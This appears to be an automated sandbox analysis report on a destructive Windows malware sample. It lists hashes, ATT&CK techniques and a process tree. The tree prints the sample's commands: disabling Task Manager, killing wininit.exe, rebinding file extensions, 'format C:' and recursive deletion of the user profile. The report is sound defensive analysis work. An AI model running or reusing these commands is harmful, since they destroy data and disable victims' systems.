5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01

Analysis

max time kernel
44s
max time network
31s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
23-11-2024 07:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.exe
Size

1.2MB
MD5

4243fc461db4268f6721a67afb54f0cc
SHA1

855a8cb7e8b85db0d54b2dca0cabe13210427823
SHA256

5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01
SHA512

c03ffcc9c42eebb5d30d8f1fb394e90bab5d995aee0eab52fcd00e2df7fc64cb45999b9c75c65181412ef0f65609ab59423bde6286e8ebb76dad693225a22e34
SSDEEP

12288:RT305Q15BbO4b76TbwCGnUc/+gB8cFKH5T3kWBmVzAbH2lixPv9fc8Cq4akGP/6u:RT3gq5bS1BsdIx3kWAzyHs0vt3N

Score

8^/10

bootkit defense_evasion discovery evasion persistence spyware stealer

Malware Config

Signatures

Disables Task Manager via registry modification
evasion
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
bootkit persistence

Bootkit
T1542.003

Processes:

5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.exe

description ioc process

File opened for modification \??\PhysicalDrive0 5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.exe
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
defense_evasion

Hidden Files and Directories
T1564.001

Processes:

cmd.exe

pid process

1672 cmd.exe
Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

description	ioc	process
File opened for modification	\??\PhysicalDrive0	5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.exe

pid	process
1672	cmd.exe

System Location Discovery: System Language Discovery 1 TTPs 45 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

cmd.execmd.execmd.execmd.exe5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.execmd.execmd.execmd.execmd.exeattrib.execmd.exereg.execmd.execmd.execmd.execmd.exeformat.comattrib.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exetaskkill.execmd.execmd.execmd.execmd.exetaskkill.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	format.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry
T1012

System Information Discovery
T1082

Processes:

format.com

description ioc process

Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier format.com
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

572 taskkill.exe
2252 taskkill.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	format.com

pid	process
572	taskkill.exe
2252	taskkill.exe

Modifies registry class 26 IoCs

Processes:

cmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "INFECTEDFILE"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.js	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.txt\ = "INFECTEDFILE"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.dat\ = "INFECTEDFILE"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.COM	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.inf	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.exe\ = "INFECTEDFILE"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "INFECTEDFILE"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "INFECTEDFILE"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.COM\ = "INFECTEDFILE"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.dll	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "INFECTEDFILE"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.dll\ = "INFECTEDFILE"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.sys\ = "INFECTEDFILE"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.inf\ = "INFECTEDFILE"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "INFECTEDFILE"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbe	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "INFECTEDFILE"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.txt	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.dat	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.sys	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.exe	cmd.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

taskkill.exeformat.comtaskkill.exe

description pid process

Token: SeDebugPrivilege 572 taskkill.exe
Token: SeBackupPrivilege 1588 format.com
Token: SeDebugPrivilege 2252 taskkill.exe

description	pid	process
Token: SeDebugPrivilege	572	taskkill.exe
Token: SeBackupPrivilege	1588	format.com
Token: SeDebugPrivilege	2252	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.execmd.execmd.exe

description	pid	process	target process
PID 2104 wrote to memory of 2868	2104	5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.exe	cmd.exe
PID 2104 wrote to memory of 2868	2104	5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.exe	cmd.exe
PID 2104 wrote to memory of 2868	2104	5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.exe	cmd.exe
PID 2104 wrote to memory of 2868	2104	5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.exe	cmd.exe
PID 2868 wrote to memory of 572	2868	cmd.exe	taskkill.exe
PID 2868 wrote to memory of 572	2868	cmd.exe	taskkill.exe
PID 2868 wrote to memory of 572	2868	cmd.exe	taskkill.exe
PID 2868 wrote to memory of 572	2868	cmd.exe	taskkill.exe
PID 2104 wrote to memory of 2536	2104	5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.exe	cmd.exe
PID 2104 wrote to memory of 2536	2104	5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.exe	cmd.exe
PID 2104 wrote to memory of 2536	2104	5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.exe	cmd.exe
PID 2104 wrote to memory of 2536	2104	5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.exe	cmd.exe
PID 2536 wrote to memory of 2096	2536	cmd.exe	reg.exe
PID 2536 wrote to memory of 2096	2536	cmd.exe	reg.exe
PID 2536 wrote to memory of 2096	2536	cmd.exe	reg.exe
PID 2536 wrote to memory of 2096	2536	cmd.exe	reg.exe
PID 2104 wrote to memory of 2872	2104	5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.exe	cmd.exe
PID 2104 wrote to memory of 2872	2104	5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.exe	cmd.exe
PID 2104 wrote to memory of 2872	2104	5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.exe	cmd.exe
PID 2104 wrote to memory of 2872	2104	5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.exe	cmd.exe
PID 2104 wrote to memory of 2444	2104	5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.exe	cmd.exe
PID 2104 wrote to memory of 2444	2104	5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.exe	cmd.exe
PID 2104 wrote to memory of 2444	2104	5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.exe	cmd.exe
PID 2104 wrote to memory of 2444	2104	5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.exe	cmd.exe
PID 2104 wrote to memory of 2148	2104	5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.exe	cmd.exe
PID 2104 wrote to memory of 2148	2104	5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.exe	cmd.exe
PID 2104 wrote to memory of 2148	2104	5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.exe	cmd.exe
PID 2104 wrote to memory of 2148	2104	5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.exe	cmd.exe
PID 2104 wrote to memory of 2832	2104	5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.exe	cmd.exe
PID 2104 wrote to memory of 2832	2104	5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.exe	cmd.exe
PID 2104 wrote to memory of 2832	2104	5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.exe	cmd.exe
PID 2104 wrote to memory of 2832	2104	5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.exe	cmd.exe
PID 2104 wrote to memory of 2784	2104	5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.exe	cmd.exe
PID 2104 wrote to memory of 2784	2104	5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.exe	cmd.exe
PID 2104 wrote to memory of 2784	2104	5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.exe	cmd.exe
PID 2104 wrote to memory of 2784	2104	5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.exe	cmd.exe
PID 2104 wrote to memory of 2436	2104	5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.exe	cmd.exe
PID 2104 wrote to memory of 2436	2104	5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.exe	cmd.exe
PID 2104 wrote to memory of 2436	2104	5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.exe	cmd.exe
PID 2104 wrote to memory of 2436	2104	5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.exe	cmd.exe
PID 2104 wrote to memory of 2680	2104	5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.exe	cmd.exe
PID 2104 wrote to memory of 2680	2104	5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.exe	cmd.exe
PID 2104 wrote to memory of 2680	2104	5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.exe	cmd.exe
PID 2104 wrote to memory of 2680	2104	5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.exe	cmd.exe
PID 2104 wrote to memory of 2864	2104	5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.exe	cmd.exe
PID 2104 wrote to memory of 2864	2104	5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.exe	cmd.exe
PID 2104 wrote to memory of 2864	2104	5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.exe	cmd.exe
PID 2104 wrote to memory of 2864	2104	5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.exe	cmd.exe
PID 2104 wrote to memory of 2040	2104	5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.exe	cmd.exe
PID 2104 wrote to memory of 2040	2104	5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.exe	cmd.exe
PID 2104 wrote to memory of 2040	2104	5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.exe	cmd.exe
PID 2104 wrote to memory of 2040	2104	5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.exe	cmd.exe
PID 2104 wrote to memory of 2376	2104	5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.exe	cmd.exe
PID 2104 wrote to memory of 2376	2104	5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.exe	cmd.exe
PID 2104 wrote to memory of 2376	2104	5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.exe	cmd.exe
PID 2104 wrote to memory of 2376	2104	5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.exe	cmd.exe
PID 2104 wrote to memory of 2028	2104	5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.exe	cmd.exe
PID 2104 wrote to memory of 2028	2104	5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.exe	cmd.exe
PID 2104 wrote to memory of 2028	2104	5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.exe	cmd.exe
PID 2104 wrote to memory of 2028	2104	5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.exe	cmd.exe
PID 2104 wrote to memory of 2648	2104	5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.exe	cmd.exe
PID 2104 wrote to memory of 2648	2104	5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.exe	cmd.exe
PID 2104 wrote to memory of 2648	2104	5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.exe	cmd.exe
PID 2104 wrote to memory of 2648	2104	5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.exe	cmd.exe

Views/modifies file attributes 1 TTPs 2 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exe

pid process

1964 attrib.exe
1864 attrib.exe

pid	process
1964	attrib.exe
1864	attrib.exe

C:\Users\Admin\AppData\Local\Temp\5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.exe
"C:\Users\Admin\AppData\Local\Temp\5592a2fb3bb32700c88214d97ae2b6dcf09b820ce0988f77d019c863fedc5a01.exe"
1⤵
- Writes to the Master Boot Record (MBR)
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2104
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /im taskmgr.exe /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2868
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im taskmgr.exe /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:572
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2536
- - C:\Windows\SysWOW64\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2096
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c set J=dir
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2872
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c %J% >LOGGED.txt
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2444
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c echo %username% >>LOGGED.txt
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2148
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c echo %os% >>LOGGED.txt
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2832
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c set pi=ipconfig /all
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2784
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c %pi% >>LOGGED.txt
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2436
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c set k=systeminfo
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2680
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c %k% >>LOGGED.txt
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2864
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c if exist GunGame.exe GunGame.exe
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2040
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c if exist AutoIT.exe AutoIT.exe
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2376
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c if exist backDoorComet.exe backDoorComet.exe
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2028
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c assoc .sys=INFECTEDFILE
  2⤵
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  PID:2648
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c assoc .inf=INFECTEDFILE
  2⤵
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  PID:1748
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c assoc .dll=INFECTEDFILE
  2⤵
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  PID:1572
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c assoc .bat=INFECTEDFILE
  2⤵
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  PID:1456
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c assoc .vbs=INFECTEDFILE
  2⤵
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  PID:1884
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c assoc .vbe=INFECTEDFILE
  2⤵
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  PID:2796
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c assoc .js=INFECTEDFILE
  2⤵
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  PID:2932
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c assoc .cmd=INFECTEDFILE
  2⤵
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  PID:2816
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c assoc .txt=INFECTEDFILE
  2⤵
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  PID:2172
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c assoc .reg=INFECTEDFILE
  2⤵
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  PID:2076
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c assoc .dat=INFECTEDFILE
  2⤵
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  PID:2120
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c assoc .COM=INFECTEDFILE
  2⤵
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  PID:1732
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c cd %userprofile% && echo ^format ^C^: ^/FS^:^NTFS ^/^X ^/^Q ^/^y >QFT.bat && if exist QFT.bat start /MIN QFT.bat
  2⤵
  - System Location Discovery: System Language Discovery
  PID:408
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /K QFT.bat
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2664
  - - C:\Windows\SysWOW64\format.com
      format C: /FS:NTFS /X /Q /y
      4⤵
      System Location Discovery: System Language Discovery
      Enumerates system info in registry
      Suspicious use of AdjustPrivilegeToken
      PID:1588
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c if exist SegaFTS.exe copy SegaFTS.exe %ProgramData%\Microsoft\Windows\Start Menu\Programs\Startup
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1972
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c copy /y SegaFTS.exe %ProgramData%\Microsoft\Windows\Start Menu\Programs
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1576
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +h +s *.*
  2⤵
  - Hide Artifacts: Hidden Files and Directories
  - System Location Discovery: System Language Discovery
  PID:1672
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s *.*
    3⤵
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:1964
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib -h -s -i -a -r desktop.ini && if exist desktop.ini del desktop.ini /f /q /s
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1240
- - C:\Windows\SysWOW64\attrib.exe
    attrib -h -s -i -a -r desktop.ini
    3⤵
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:1864
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c del %userprofile%\*.* /f /q /s
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1960
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c if exist backDoorComet.exe BackDoorComet.exe
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1700
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c if exist AgentOSOX.exe AgentOSOX.exe
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2152
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c if exist RWORM2000.VBS RWORM2000.VBS
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1680
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c if exist Virus.exe Virus.exe
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3044
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c assoc .exe=INFECTEDFILE
  2⤵
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  PID:1220
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /im wininit.exe /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:576
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im wininit.exe /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2252

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Pre-OS Boot

T1542

Bootkit

T1542.003

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Indicator Removal

T1070

File Deletion

